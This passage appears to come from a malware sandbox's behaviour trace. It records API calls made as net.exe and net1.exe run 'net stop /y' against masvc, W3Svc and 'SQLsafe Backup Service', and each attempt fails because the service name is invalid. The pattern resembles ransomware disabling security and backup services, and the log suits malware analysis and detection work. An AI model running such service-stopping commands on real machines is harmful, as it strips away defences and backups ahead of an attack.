_wcsicmp (_String1="lanmanworkstation", _String2="masvc") returned -1 [0206.912] _wcsicmp (_String1="server", _String2="masvc") returned 6 [0206.912] _wcsicmp (_String1="svr", _String2="masvc") returned 6 [0206.912] _wcsicmp (_String1="srv", _String2="masvc") returned 6 [0206.912] _wcsicmp (_String1="lanmanserver", _String2="masvc") returned -1 [0206.912] _wcsicmp (_String1="alerter", _String2="masvc") returned -12 [0206.912] _wcsicmp (_String1="netlogon", _String2="masvc") returned 1 [0206.913] _wcsupr (in: _String="masvc" | out: _String="MASVC") returned="MASVC" [0206.913] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5054a0 [0206.915] GetServiceKeyNameW (in: hSCManager=0x5054a0, lpDisplayName="MASVC", lpServiceName=0xacaaf0, lpcchBuffer=0x22fa8c | out: lpServiceName="", lpcchBuffer=0x22fa8c) returned 0 [0206.916] _wcsicmp (_String1="msg", _String2="MASVC") returned 18 [0206.916] _wcsicmp (_String1="messenger", _String2="MASVC") returned 4 [0206.916] _wcsicmp (_String1="receiver", _String2="MASVC") returned 5 [0206.916] _wcsicmp (_String1="rcv", _String2="MASVC") returned 5 [0206.916] _wcsicmp (_String1="redirector", _String2="MASVC") returned 5 [0206.916] _wcsicmp (_String1="redir", _String2="MASVC") returned 5 [0206.916] _wcsicmp (_String1="rdr", _String2="MASVC") returned 5 [0206.916] _wcsicmp (_String1="workstation", _String2="MASVC") returned 10 [0206.916] _wcsicmp (_String1="work", _String2="MASVC") returned 10 [0206.916] _wcsicmp (_String1="wksta", _String2="MASVC") returned 10 [0206.916] _wcsicmp (_String1="prdr", _String2="MASVC") returned 3 [0206.916] _wcsicmp (_String1="devrdr", _String2="MASVC") returned -9 [0206.916] _wcsicmp (_String1="lanmanworkstation", _String2="MASVC") returned -1 [0206.916] _wcsicmp (_String1="server", _String2="MASVC") returned 6 [0206.916] _wcsicmp (_String1="svr", _String2="MASVC") returned 6 [0206.916] _wcsicmp (_String1="srv", _String2="MASVC") returned 6 [0206.916] _wcsicmp (_String1="lanmanserver", _String2="MASVC") returned -1 [0206.916] _wcsicmp (_String1="alerter", _String2="MASVC") returned -12 [0206.916] _wcsicmp (_String1="netlogon", _String2="MASVC") returned 1 [0206.916] NetServiceControl (in: servername=0x0, service="MASVC", opcode=0x0, arg=0x0, bufptr=0x22fa88 | out: bufptr=0x22fa88) returned 0x889 [0206.917] wcscpy_s (in: _Destination=0xaca4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0206.917] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0206.918] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xacb338, nSize=0x800, Arguments=0xac9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0206.919] GetFileType (hFile=0x26c) returned 0x3 [0206.919] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x503fd0 [0206.919] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x503fd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0206.919] WriteFile (in: hFile=0x26c, lpBuffer=0x503fd0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x22f9c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22f9c8, lpOverlapped=0x0) returned 0 [0206.919] LocalFree (hMem=0x503fd0) returned 0x0 [0206.919] GetFileType (hFile=0x26c) returned 0x3 [0206.919] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x506278 [0206.919] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x506278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nP", lpUsedDefaultChar=0x0) returned 2 [0206.919] WriteFile (in: hFile=0x26c, lpBuffer=0x506278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x22f9c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22f9c8, lpOverlapped=0x0) returned 0 [0206.919] LocalFree (hMem=0x506278) returned 0x0 [0206.919] _ultow (in: _Dest=0x889, _Radix=2292216 | out: _Dest=0x889) returned="2185" [0206.919] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xacb338, nSize=0x800, Arguments=0xac9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0206.919] GetFileType (hFile=0x26c) returned 0x3 [0206.919] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x506278 [0206.919] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x506278, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0206.920] WriteFile (in: hFile=0x26c, lpBuffer=0x506278, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x22f9d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22f9d4, lpOverlapped=0x0) returned 0 [0206.920] LocalFree (hMem=0x506278) returned 0x0 [0206.920] GetFileType (hFile=0x26c) returned 0x3 [0206.920] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x506278 [0206.920] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x506278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nP", lpUsedDefaultChar=0x0) returned 2 [0206.920] WriteFile (in: hFile=0x26c, lpBuffer=0x506278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x22f9d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22f9d4, lpOverlapped=0x0) returned 0 [0206.920] LocalFree (hMem=0x506278) returned 0x0 [0206.920] NetApiBufferFree (Buffer=0x501c50) returned 0x0 [0206.920] NetApiBufferFree (Buffer=0x501c68) returned 0x0 [0206.920] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop masvc /y" [0206.921] exit (_Code=2) Process: id = "244" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4d926000" os_pid = "0x8f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop W3Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 417 os_tid = 0x330 Process: id = "245" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4c5db000" os_pid = "0x930" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "244" os_parent_pid = "0x8f0" cmd_line = "C:\\Windows\\system32\\net1 stop W3Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 418 os_tid = 0x950 [0207.059] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afcd8 | out: lpSystemTimeAsFileTime=0x1afcd8*(dwLowDateTime=0x449a7320, dwHighDateTime=0x1d57a87)) [0207.059] GetCurrentProcessId () returned 0x930 [0207.059] GetCurrentThreadId () returned 0x950 [0207.059] GetTickCount () returned 0x116d5e6 [0207.059] QueryPerformanceCounter (in: lpPerformanceCount=0x1afcd0 | out: lpPerformanceCount=0x1afcd0*=32734370884) returned 1 [0207.059] GetModuleHandleA (lpModuleName=0x0) returned 0x4b0000 [0207.059] __set_app_type (_Type=0x1) [0207.059] __p__fmode () returned 0x74eb31f4 [0207.059] __p__commode () returned 0x74eb31fc [0207.060] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4bffe6) returned 0x0 [0207.060] __getmainargs (in: _Argc=0x4c9064, _Argv=0x4c906c, _Env=0x4c9068, _DoWildCard=0, _StartInfo=0x4c9024 | out: _Argc=0x4c9064, _Argv=0x4c906c, _Env=0x4c9068) returned 0 [0207.060] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.060] GetConsoleOutputCP () returned 0x1b5 [0207.060] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4c9080 | out: lpCPInfo=0x4c9080) returned 1 [0207.060] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.063] sprintf_s (in: _DstBuf=0x1afc90, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0207.064] setlocale (category=0, locale=".437") returned="English_United States.437" [0207.066] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0207.066] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0207.066] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop W3Svc /y" [0207.066] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1afa5c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0207.066] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x0, Size=0x5e) returned 0x393bf0 [0207.066] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0207.066] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1afc60 | out: Buffer=0x1afc60*=0x391c50) returned 0x0 [0207.066] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1afc60 | out: Buffer=0x1afc60*=0x391c68) returned 0x0 [0207.066] _fileno (_File=0x74eb2900) returned -2 [0207.066] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0207.066] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0207.066] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0207.066] _wcsicmp (_String1="config", _String2="stop") returned -16 [0207.067] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0207.067] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0207.067] _wcsicmp (_String1="file", _String2="stop") returned -13 [0207.067] _wcsicmp (_String1="files", _String2="stop") returned -13 [0207.067] _wcsicmp (_String1="group", _String2="stop") returned -12 [0207.067] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0207.067] _wcsicmp (_String1="help", _String2="stop") returned -11 [0207.067] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0207.067] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0207.067] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0207.067] _wcsicmp (_String1="session", _String2="stop") returned -15 [0207.067] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0207.067] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0207.067] _wcsicmp (_String1="share", _String2="stop") returned -12 [0207.067] _wcsicmp (_String1="start", _String2="stop") returned -14 [0207.067] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0207.067] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0207.067] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0207.067] _wcsicmp (_String1="accounts", _String2="W3Svc") returned -22 [0207.067] _wcsicmp (_String1="computer", _String2="W3Svc") returned -20 [0207.067] _wcsicmp (_String1="config", _String2="W3Svc") returned -20 [0207.067] _wcsicmp (_String1="continue", _String2="W3Svc") returned -20 [0207.067] _wcsicmp (_String1="cont", _String2="W3Svc") returned -20 [0207.067] _wcsicmp (_String1="file", _String2="W3Svc") returned -17 [0207.067] _wcsicmp (_String1="files", _String2="W3Svc") returned -17 [0207.067] _wcsicmp (_String1="group", _String2="W3Svc") returned -16 [0207.067] _wcsicmp (_String1="groups", _String2="W3Svc") returned -16 [0207.067] _wcsicmp (_String1="help", _String2="W3Svc") returned -15 [0207.067] _wcsicmp (_String1="helpmsg", _String2="W3Svc") returned -15 [0207.067] _wcsicmp (_String1="localgroup", _String2="W3Svc") returned -11 [0207.067] _wcsicmp (_String1="pause", _String2="W3Svc") returned -7 [0207.067] _wcsicmp (_String1="session", _String2="W3Svc") returned -4 [0207.067] _wcsicmp (_String1="sessions", _String2="W3Svc") returned -4 [0207.067] _wcsicmp (_String1="sess", _String2="W3Svc") returned -4 [0207.067] _wcsicmp (_String1="share", _String2="W3Svc") returned -4 [0207.067] _wcsicmp (_String1="start", _String2="W3Svc") returned -4 [0207.068] _wcsicmp (_String1="stats", _String2="W3Svc") returned -4 [0207.068] _wcsicmp (_String1="statistics", _String2="W3Svc") returned -4 [0207.068] _wcsicmp (_String1="stop", _String2="W3Svc") returned -4 [0207.068] _wcsicmp (_String1="time", _String2="W3Svc") returned -3 [0207.068] _wcsicmp (_String1="user", _String2="W3Svc") returned -2 [0207.068] _wcsicmp (_String1="users", _String2="W3Svc") returned -2 [0207.068] _wcsicmp (_String1="msg", _String2="W3Svc") returned -10 [0207.068] _wcsicmp (_String1="messenger", _String2="W3Svc") returned -10 [0207.068] _wcsicmp (_String1="receiver", _String2="W3Svc") returned -5 [0207.068] _wcsicmp (_String1="rcv", _String2="W3Svc") returned -5 [0207.068] _wcsicmp (_String1="netpopup", _String2="W3Svc") returned -9 [0207.068] _wcsicmp (_String1="redirector", _String2="W3Svc") returned -5 [0207.068] _wcsicmp (_String1="redir", _String2="W3Svc") returned -5 [0207.068] _wcsicmp (_String1="rdr", _String2="W3Svc") returned -5 [0207.068] _wcsicmp (_String1="workstation", _String2="W3Svc") returned 60 [0207.068] _wcsicmp (_String1="work", _String2="W3Svc") returned 60 [0207.068] _wcsicmp (_String1="wksta", _String2="W3Svc") returned 56 [0207.068] _wcsicmp (_String1="prdr", _String2="W3Svc") returned -7 [0207.068] _wcsicmp (_String1="devrdr", _String2="W3Svc") returned -19 [0207.068] _wcsicmp (_String1="lanmanworkstation", _String2="W3Svc") returned -11 [0207.068] _wcsicmp (_String1="server", _String2="W3Svc") returned -4 [0207.068] _wcsicmp (_String1="svr", _String2="W3Svc") returned -4 [0207.068] _wcsicmp (_String1="srv", _String2="W3Svc") returned -4 [0207.068] _wcsicmp (_String1="lanmanserver", _String2="W3Svc") returned -11 [0207.068] _wcsicmp (_String1="alerter", _String2="W3Svc") returned -22 [0207.068] _wcsicmp (_String1="netlogon", _String2="W3Svc") returned -9 [0207.068] _wcsupr (in: _String="W3Svc" | out: _String="W3SVC") returned="W3SVC" [0207.068] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3954a0 [0207.071] GetServiceKeyNameW (in: hSCManager=0x3954a0, lpDisplayName="W3SVC", lpServiceName=0x4caaf0, lpcchBuffer=0x1afbfc | out: lpServiceName="", lpcchBuffer=0x1afbfc) returned 0 [0207.071] _wcsicmp (_String1="msg", _String2="W3SVC") returned -10 [0207.071] _wcsicmp (_String1="messenger", _String2="W3SVC") returned -10 [0207.071] _wcsicmp (_String1="receiver", _String2="W3SVC") returned -5 [0207.071] _wcsicmp (_String1="rcv", _String2="W3SVC") returned -5 [0207.071] _wcsicmp (_String1="redirector", _String2="W3SVC") returned -5 [0207.071] _wcsicmp (_String1="redir", _String2="W3SVC") returned -5 [0207.071] _wcsicmp (_String1="rdr", _String2="W3SVC") returned -5 [0207.071] _wcsicmp (_String1="workstation", _String2="W3SVC") returned 60 [0207.071] _wcsicmp (_String1="work", _String2="W3SVC") returned 60 [0207.072] _wcsicmp (_String1="wksta", _String2="W3SVC") returned 56 [0207.072] _wcsicmp (_String1="prdr", _String2="W3SVC") returned -7 [0207.072] _wcsicmp (_String1="devrdr", _String2="W3SVC") returned -19 [0207.072] _wcsicmp (_String1="lanmanworkstation", _String2="W3SVC") returned -11 [0207.072] _wcsicmp (_String1="server", _String2="W3SVC") returned -4 [0207.072] _wcsicmp (_String1="svr", _String2="W3SVC") returned -4 [0207.072] _wcsicmp (_String1="srv", _String2="W3SVC") returned -4 [0207.072] _wcsicmp (_String1="lanmanserver", _String2="W3SVC") returned -11 [0207.072] _wcsicmp (_String1="alerter", _String2="W3SVC") returned -22 [0207.072] _wcsicmp (_String1="netlogon", _String2="W3SVC") returned -9 [0207.072] NetServiceControl (in: servername=0x0, service="W3SVC", opcode=0x0, arg=0x0, bufptr=0x1afbf8 | out: bufptr=0x1afbf8) returned 0x889 [0207.073] wcscpy_s (in: _Destination=0x4ca4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0207.073] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0207.074] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x4cb338, nSize=0x800, Arguments=0x4c9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0207.075] GetFileType (hFile=0x26c) returned 0x3 [0207.075] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x393fd0 [0207.075] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x393fd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0207.075] WriteFile (in: hFile=0x26c, lpBuffer=0x393fd0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1afb38, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1afb38, lpOverlapped=0x0) returned 0 [0207.075] LocalFree (hMem=0x393fd0) returned 0x0 [0207.075] GetFileType (hFile=0x26c) returned 0x3 [0207.075] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x396278 [0207.075] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x396278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n9", lpUsedDefaultChar=0x0) returned 2 [0207.075] WriteFile (in: hFile=0x26c, lpBuffer=0x396278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1afb38, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1afb38, lpOverlapped=0x0) returned 0 [0207.075] LocalFree (hMem=0x396278) returned 0x0 [0207.075] _ultow (in: _Dest=0x889, _Radix=1768296 | out: _Dest=0x889) returned="2185" [0207.076] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x4cb338, nSize=0x800, Arguments=0x4c9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0207.076] GetFileType (hFile=0x26c) returned 0x3 [0207.076] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x396278 [0207.076] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x396278, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0207.076] WriteFile (in: hFile=0x26c, lpBuffer=0x396278, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1afb44, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1afb44, lpOverlapped=0x0) returned 0 [0207.076] LocalFree (hMem=0x396278) returned 0x0 [0207.076] GetFileType (hFile=0x26c) returned 0x3 [0207.076] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x396278 [0207.076] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x396278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n9", lpUsedDefaultChar=0x0) returned 2 [0207.076] WriteFile (in: hFile=0x26c, lpBuffer=0x396278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1afb44, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1afb44, lpOverlapped=0x0) returned 0 [0207.076] LocalFree (hMem=0x396278) returned 0x0 [0207.076] NetApiBufferFree (Buffer=0x391c50) returned 0x0 [0207.077] NetApiBufferFree (Buffer=0x391c68) returned 0x0 [0207.077] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop W3Svc /y" [0207.077] exit (_Code=2) Process: id = "246" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x60b2b000" os_pid = "0x968" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£SQLsafe Backup ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 419 os_tid = 0x8ac Process: id = "247" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5b38d000" os_pid = "0x8a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "246" os_parent_pid = "0x968" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£SQLsafe Backup ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 420 os_tid = 0xa0c [0207.208] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x39fa7c | out: lpSystemTimeAsFileTime=0x39fa7c*(dwLowDateTime=0x44b240e0, dwHighDateTime=0x1d57a87)) [0207.208] GetCurrentProcessId () returned 0x8a8 [0207.208] GetCurrentThreadId () returned 0xa0c [0207.208] GetTickCount () returned 0x116d682 [0207.208] QueryPerformanceCounter (in: lpPerformanceCount=0x39fa74 | out: lpPerformanceCount=0x39fa74*=32749301875) returned 1 [0207.209] GetModuleHandleA (lpModuleName=0x0) returned 0x2e0000 [0207.209] __set_app_type (_Type=0x1) [0207.209] __p__fmode () returned 0x74eb31f4 [0207.209] __p__commode () returned 0x74eb31fc [0207.209] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2effe6) returned 0x0 [0207.209] __getmainargs (in: _Argc=0x2f9064, _Argv=0x2f906c, _Env=0x2f9068, _DoWildCard=0, _StartInfo=0x2f9024 | out: _Argc=0x2f9064, _Argv=0x2f906c, _Env=0x2f9068) returned 0 [0207.209] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.209] GetConsoleOutputCP () returned 0x1b5 [0207.209] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x2f9080 | out: lpCPInfo=0x2f9080) returned 1 [0207.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.212] sprintf_s (in: _DstBuf=0x39fa34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0207.213] setlocale (category=0, locale=".437") returned="English_United States.437" [0207.214] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0207.215] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0207.215] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£SQLsafe Backup ServiceΓÇ¥ /y" [0207.215] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x39f800, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0207.215] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x94) returned 0x444c00 [0207.215] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0207.215] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x39fa04 | out: Buffer=0x39fa04*=0x441c98) returned 0x0 [0207.215] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x39fa04 | out: Buffer=0x39fa04*=0x441cb0) returned 0x0 [0207.215] _fileno (_File=0x74eb2900) returned -2 [0207.215] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0207.215] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0207.215] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0207.215] _wcsicmp (_String1="config", _String2="stop") returned -16 [0207.215] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0207.215] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0207.215] _wcsicmp (_String1="file", _String2="stop") returned -13 [0207.215] _wcsicmp (_String1="files", _String2="stop") returned -13 [0207.215] _wcsicmp (_String1="group", _String2="stop") returned -12 [0207.216] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0207.216] _wcsicmp (_String1="help", _String2="stop") returned -11 [0207.216] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0207.216] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0207.216] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0207.216] _wcsicmp (_String1="session", _String2="stop") returned -15 [0207.216] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0207.216] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0207.216] _wcsicmp (_String1="share", _String2="stop") returned -12 [0207.216] _wcsicmp (_String1="start", _String2="stop") returned -14 [0207.216] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0207.216] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0207.216] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0207.216] _wcsicmp (_String1="accounts", _String2="ΓÇ£SQLsafe") returned -850 [0207.216] _wcsicmp (_String1="computer", _String2="ΓÇ£SQLsafe") returned -848 [0207.216] _wcsicmp (_String1="config", _String2="ΓÇ£SQLsafe") returned -848 [0207.216] _wcsicmp (_String1="continue", _String2="ΓÇ£SQLsafe") returned -848 [0207.216] _wcsicmp (_String1="cont", _String2="ΓÇ£SQLsafe") returned -848 [0207.216] _wcsicmp (_String1="file", _String2="ΓÇ£SQLsafe") returned -845 [0207.216] _wcsicmp (_String1="files", _String2="ΓÇ£SQLsafe") returned -845 [0207.216] _wcsicmp (_String1="group", _String2="ΓÇ£SQLsafe") returned -844 [0207.216] _wcsicmp (_String1="groups", _String2="ΓÇ£SQLsafe") returned -844 [0207.216] _wcsicmp (_String1="help", _String2="ΓÇ£SQLsafe") returned -843 [0207.216] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£SQLsafe") returned -843 [0207.216] _wcsicmp (_String1="localgroup", _String2="ΓÇ£SQLsafe") returned -839 [0207.216] _wcsicmp (_String1="pause", _String2="ΓÇ£SQLsafe") returned -835 [0207.216] _wcsicmp (_String1="session", _String2="ΓÇ£SQLsafe") returned -832 [0207.216] _wcsicmp (_String1="sessions", _String2="ΓÇ£SQLsafe") returned -832 [0207.216] _wcsicmp (_String1="sess", _String2="ΓÇ£SQLsafe") returned -832 [0207.216] _wcsicmp (_String1="share", _String2="ΓÇ£SQLsafe") returned -832 [0207.216] _wcsicmp (_String1="start", 